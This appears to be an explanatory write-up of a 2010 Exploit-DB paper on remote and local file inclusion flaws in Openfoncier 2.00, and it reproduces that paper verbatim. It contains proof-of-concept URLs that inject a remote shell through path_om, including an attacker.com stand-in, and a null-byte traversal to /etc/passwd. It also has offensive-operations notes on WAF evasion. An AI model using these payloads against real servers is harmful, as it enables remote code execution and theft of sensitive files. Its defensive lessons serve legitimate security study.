Openfoncier 2.00 RFI/LFI Vulnerability Explained

Openfoncier 2.00 RFI/LFI Vulnerability Explained
What this paper is
This paper, published by cr4wl3r on April 24, 2010, details a vulnerability in Openfoncier version 2.00. The vulnerability allows for both Remote File Inclusion (RFI) and Local File Inclusion (LFI) attacks. This means an attacker could potentially include and execute code from a remote server or read sensitive files from the local server.
Simple technical breakdown
The core of the vulnerability lies in how Openfoncier handles user-supplied input, specifically parameters like path_om and dsn[phptype]. These parameters are used in file inclusion functions within the PHP code.
- Remote File Inclusion (RFI): If the application uses a parameter to include files without proper sanitization, an attacker can provide a URL to a malicious script hosted on their own server. The vulnerable application will then download and execute this script.
- Local File Inclusion (LFI): Similarly, if a parameter is used to include local files without proper validation, an attacker can trick the application into including and displaying the content of sensitive files on the server, such as configuration files or password files.
Complete code and payload walkthrough
The provided paper does not contain actual exploit code or shellcode. Instead, it lists Proof of Concept (PoC) URLs demonstrating how to trigger the vulnerabilities. The paper also includes ASCII art and acknowledgments, but no executable code or shellcode bytes to analyze.
The PoC examples provided are:
RFI Examples:
http://shell4u.tk/[path]/obj/action.class.php?path_om=[Shell]http://shell4u.tk/[path]/obj/architecte.class.php?path_om=[Shell]http://shell4u.tk/[path]/obj/avis.class.php?path_om=[Shell]http://shell4u.tk/[path]/obj/bible.class.php?path_om=[Shell]http://shell4u.tk/[path]/obj/blocnote.class.php?path_om=[Shell]
Explanation:
These URLs suggest that thepath_omparameter in various.class.phpfiles is vulnerable to RFI. The attacker would replace[Shell]with a URL pointing to a remote PHP shell script they control. When the application processes these URLs, it would include and execute the remote script.LFI Example:
http://shell4u.tk/[path]/scr/soustab.php?dsn[phptype]=[LFI%00]
Explanation:
This URL indicates that thedsn[phptype]parameter insoustab.phpis vulnerable to LFI. The[LFI%00]part suggests that the attacker would replace this with a path to a local file on the server, potentially followed by a null byte (%00) to truncate further processing. For example, to read/etc/passwd, an attacker might use../../../../etc/passwd%00.
Mapping:
path_omparameter (in RFI PoCs) -> Used to include remote files.dsn[phptype]parameter (in LFI PoC) -> Used to include local files.[Shell]placeholder -> To be replaced with a URL to a remote malicious script.[LFI%00]placeholder -> To be replaced with a path to a local sensitive file, potentially followed by a null byte.
Code/Payload Segments:
There are no explicit code blocks or shellcode bytes provided in the original paper source to analyze. The "code" consists solely of example URLs.
Practical details for offensive operations teams
- Required Access Level: Typically, low privileges are required. This vulnerability can be exploited by any unauthenticated user who can interact with the vulnerable web application.
- Lab Preconditions:
- A target environment running Openfoncier version 2.00.
- Network access to the target web application.
- For RFI: A controlled web server capable of hosting malicious PHP scripts.
- For LFI: Knowledge of potential sensitive file paths on the target system.
- Tooling Assumptions:
- A web browser for manual testing.
- A web proxy (e.g., Burp Suite, OWASP ZAP) for intercepting and modifying requests.
- A remote server for hosting RFI payloads.
- Potentially, a command-line tool like
curlfor automated testing.
- Execution Pitfalls:
- WAF/IDS Evasion: Web Application Firewalls (WAFs) and Intrusion Detection Systems (IDS) might detect common RFI/LFI patterns. Obfuscation techniques or using less common file inclusion functions might be necessary.
- Path Traversal Limitations: For LFI, the effectiveness depends on the application's directory structure and whether path traversal sequences (
../) are properly handled. - PHP Configuration: RFI might be disabled by default on some PHP configurations (
allow_url_fopen = Off). - Application Logic: The specific files and parameters listed in the PoC might not be present or might have been patched in slightly modified versions of Openfoncier. Thorough reconnaissance of the target application is crucial.
- Null Byte Effectiveness: The null byte (
%00) for LFI truncation might not be effective if the application properly sanitizes or handles file paths.
- Telemetry:
- RFI:
- Network logs showing outbound connections from the target server to the attacker's RFI server.
- Web server logs on the attacker's server showing requests for the malicious PHP script.
- Application logs on the target server showing unexpected file inclusions or execution of remote code.
- System logs on the target server showing unusual process execution if the RFI payload executes commands.
- LFI:
- Web server access logs showing requests for sensitive files (e.g.,
/etc/passwd, configuration files). - Application logs showing the content of these files being returned in responses.
- Potential error messages if the attacker attempts to access non-existent files or files with restricted permissions.
- Web server access logs showing requests for sensitive files (e.g.,
- RFI:
Where this was used and when
This vulnerability was discovered and published in 2010. Openfoncier was a web application, likely used by local government or administrative bodies in French-speaking regions, given the name and download link. Exploits of this nature were common in web applications developed around that time, especially those with less rigorous security development practices. The specific use in real-world attacks is not detailed in the paper, but such vulnerabilities are typically exploited to gain unauthorized access, steal sensitive data, or establish a persistent presence on a compromised server.
Defensive lessons for modern teams
- Input Validation and Sanitization: Always validate and sanitize all user-supplied input, especially when it's used in file paths or inclusion operations.
- Least Privilege: Ensure web applications run with the minimum necessary privileges.
- Secure Configuration: Disable
allow_url_fopenandallow_url_includein PHP configurations unless absolutely necessary and properly secured. - Regular Patching: Keep all web applications and their dependencies updated to the latest secure versions.
- Web Application Firewalls (WAFs): Deploy and configure WAFs to detect and block common attack patterns like RFI and LFI.
- Code Auditing: Regularly perform security code reviews and penetration testing to identify vulnerabilities before they are exploited.
- Logging and Monitoring: Implement comprehensive logging and monitor for suspicious activities, such as unusual file access patterns or outbound network connections.
ASCII visual (if applicable)
This vulnerability is primarily about how a web application processes URLs. A simple visual representation of the flow is possible:
+-----------------+ +-----------------+ +-------------------+
| Attacker's |----->| Target Web |----->| Vulnerable |
| Server (RFI) | | Application | | Openfoncier |
| or Local System | | (e.g., Apache) | | (PHP Script) |
+-----------------+ +-----------------+ +-------------------+
^
| User Input (URL Parameter)
|
| (e.g., ?path_om=http://attacker.com/shell.php)
| (e.g., ?dsn[phptype]=../../etc/passwd%00)
|
v
+-----------------------+
| File Inclusion Logic |
| (Vulnerable) |
+-----------------------+
|
| Includes Remote/Local File
|
v
+-----------------------+
| Execution / Data Leak |
+-----------------------+Source references
- Paper ID: 12366
- Paper Title: Openfoncier 2.00 - Local File Inclusion / Remote File Inclusion
- Author: cr4wl3r
- Published: 2010-04-24
- Keywords: PHP, webapps
- Paper URL: https://www.exploit-db.com/papers/12366
- Raw URL: https://www.exploit-db.com/raw/12366
Original Exploit-DB Content (Verbatim)
==============================================================
Openfoncier 2.00 (RFI/LFI) Multiple File Include Vulnerability
==============================================================
[+] Openfoncier 2.00 (RFI/LFI) Multiple File Include Vulnerability
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ###################################### 1
0 I'm cr4wl3r member from Inj3ct0r Team 1
1 ###################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+] Discovered By: cr4wl3r
[+] Download: https://adullact.net/frs/download.php/4567/openmairie_foncier_2.00.zip
[+] Greetz: All member inj3ct0r.com, manadocoding.net, sekuritionline.net, gcc.web.id
[+] Thanks to: opt!x hacker, xoron, cyberlog, irvian, antihack, angky.tatoki,
EA ngel, zvtral, s4va, bL4Ck_3n91n3, untouch, team_elite, zreg, mywisdom,
SENOT, kec0a, d3viln3t, p4p4y, cybertomat, etaxCrew, emen, and all my friend
[+] PoC:
[~] RFI:
http://shell4u.tk/[path]/obj/action.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/architecte.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/avis.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/bible.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/blocnote.class.php?path_om=[Shell]
[~] LFI:
http://shell4u.tk/[path]/scr/soustab.php?dsn[phptype]=[LFI%00]
# Inj3ct0r.com [2010-04-24]